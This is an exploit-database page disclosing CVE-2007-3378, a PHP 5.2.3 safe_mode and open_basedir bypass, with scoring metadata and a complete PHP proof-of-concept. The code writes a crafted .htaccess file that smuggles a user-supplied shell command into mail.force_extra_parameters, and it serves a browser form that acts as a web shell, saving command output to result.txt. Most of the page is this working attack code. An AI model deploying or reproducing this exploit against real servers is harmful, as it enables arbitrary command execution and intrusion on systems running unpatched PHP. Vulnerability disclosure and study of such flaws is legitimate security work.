PHP 5.2.3, htaccess safemode and open_basedir Bypass PoC

Published
Credit
Risk
2007.06.27
Maksymilian Arciemowicz
High
CWE
CVE
Local
Remote
CWE-DesignError
CVE-2007-3378
Yes
No

CVSS Base Score
Impact Subscore
Exploitability Subscore
6.8/10
6.4/10
8.6/10
Exploit range
Attack complexity
Authentication
Remote
Medium
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

<?php
# Coded by Maksymilian Arciemowicz
#
# CVE : CVE-2007-3378
# Risk : High
# Remote Exploit : No
# Local Exploit : Yes
# Affected Software : PHP 5.2.3 and prior
#
# This exploit bypass safe_mode , open_basedir and disbale functions .
# First it creates crafted .htaccess file and then all executed commands are written to result.txt file using mail(); function.
# Usage :
# ?cxib=dhr - Delete Delete .htaccess and result.txt
# ?sh=[our_command] - Execute the command
#

#variables
$htaccess="./.htaccess";
#variables


if(@mail("", "", "")==FALSE){
die("mail() function isn't active.");
}

if(!is_writable("./")){
die("This directory isn't writable.");
}

if($_GET['cxib']=="dhr"){
@unlink("./.htaccess");
@unlink("./result.txt");
}

$usun="";
if(file_exists("./result.txt") AND file_exists("./.htaccess")){
$usun .= "<p><a href=\"http://".$_SERVER["HTTP_HOST"].
$_SERVER["SCRIPT_NAME"]."?cxib=dhr\">Delete .htaccess and result.txt</a>";
}


$htmlstart="<HTML>
<HEAD>
<TITLE>CXSecurity Exploit - PHP 5.2.3 and
prior</TITLE>
</HEAD>
<BODY>";

$formtxt="<center>Exploit for PHP 5.2.3 and
prior</p>
".$usun."
<p>Form:<br>

<form action=\"http://".$_SERVER["HTTP_HOST"].$_SERVER["SCRIPT_NAME"]."\"
name=\"Form\" method=\"POST\">
sh# <input type=\"text\" name=\"sh\" size=\"50\" value=\"\">
<input type=\"submit\" name=\"sent\" value=\"Exec\">
</form>
</CENTER></B>";

$htmlend="</BODY>
</HTML>";

$path=dirname($_SERVER["SCRIPT_NAME"]);

if(empty($sh)){
if(empty($_GET['sh'])){
if(empty($_POST['sh'])){

echo $htmlstart.$formtxt;

if(file_exists("./result.txt")){
echo "<center><iframe src=\"http://".$_SERVER["HTTP_HOST"].
$path."/result.txt\" height=300 width=1000></center>";
}

echo $htmlend;

exit();
} else {
$sh=$_POST['sh'];
}
} else {
$sh=$_GET['sh'];
}
}

if (!$handle = @fopen($htaccess, 'w')) {
echo "Cannot create ".$htaccess."<B>check your rights to this directory.<P>. exit();";
exit;
}

$syntax="php_value mail.force_extra_parameters '-t && ".$sh." > ".dirname(__FILE__)."/result.txt'";

if (fwrite($handle, $syntax) === FALSE) {
echo "Cannot write to file (".$htaccess.")";
exit;
}

if(!empty($_POST['sent'])){
@mail("", "", "Yeah");
sleep(2);
header("Location: http://".$_SERVER["HTTP_HOST"].
$_SERVER["REQUEST_URI"]."?cxib=".date('s'));
exit();
}

?>

References:

http://cxsecurity.com/issue/WLB-2007060092


See this note in RAW Version

 
Bugtraq RSS
Bugtraq
 
CVE RSS
CVEMAP
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn


Copyright 2017, cxsecurity.com